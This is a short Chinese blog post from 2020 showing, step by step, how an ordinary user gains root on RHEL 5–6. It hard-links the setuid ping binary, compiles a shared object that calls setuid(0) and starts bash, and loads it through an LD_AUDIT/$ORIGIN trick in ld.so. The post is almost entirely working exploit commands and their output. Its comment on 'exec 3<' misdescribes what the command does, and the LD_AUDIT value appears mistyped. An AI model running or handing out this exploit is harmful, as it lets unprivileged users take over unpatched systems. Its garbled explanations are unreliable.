RHEL5-6普通用户提权root

Posted 2020-08-21

[[email protected] ~]# whoami   ##我是谁

root

[[email protected] ~]# useradd putong

[[email protected] ~]# su - putong

[[email protected] ~]$ whoami

putong

[[email protected] ~]$ ll -d /tmp/

drwxrwxrwt. 3 root root 4096 12月  2 03:11 /tmp/

[[email protected] ~]$ cd /tmp/

[[email protected] tmp]$ mkdir ceshi

[[email protected] tmp]$ ln /bin/ping /tmp/ceshi/ceshi   ##创建一个硬链接

[[email protected] tmp]$ ll !$

ll /tmp/ceshi/ceshi

-rwsr-xr-x. 2 root root 40760 9月  26 2013 /tmp/ceshi/ceshi

[[email protected] tmp]$ exec 3< /tmp/ceshi/ceshi   ##系统调用exec是以新的进程去代替原来的进程，但进程的PID保持不变。因此，可以这样认为，exec系统调用并没有创建新的

进程，只是替换了原来进程上下文的内容。原进程的代码段，数据段，堆栈段被新的进程所代替。

[[email protected] tmp]$ ll /proc/$$/fd/3

lr-x------ 1 putong putong 64 12月  2 03:19 /proc/1346/fd/3 -> /tmp/ceshi/ceshi

[[email protected] tmp]$ rm -rf /tmp/ceshi/

[[email protected] tmp]$ ll /proc/1346/fd/3

lr-x------ 1 putong putong 64 12月  2 03:19 /proc/1346/fd/3 -> /tmp/ceshi/ceshi (deleted)

 

[[email protected] tmp]$ vim root.c  ##创建一个c语言脚本

void __attribute__((constructor)) init() ##注意；__这是两个_下划线

{

    setuid(0);

    system("/bin/bash");

}

：wq

[[email protected] tmp]$ gcc -w -fPIC -shared -o /tmp/ceshi root.c  ## -o 输出

[[email protected] tmp]$ ll /tmp/ceshi

-rwxrwxr-x 1 putong putong 6017 12月  2 03:25 /tmp/ceshi

[[email protected] tmp]$ LD_AUDIT="ORIGIN" exec /proc/self/fd/3

ERROR: ld.so: object ‘ORIGIN‘ cannot be loaded as audit interface: cannot open shared object file; ignored.

Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]

            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]

            [-M mtu discovery hint] [-S sndbuf]

            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination

[[email protected] ~]#

[[email protected] ~]# whoami

root

本文出自 “11628205” 博客，请务必保留此出处http://11638205.blog.51cto.com/11628205/1878828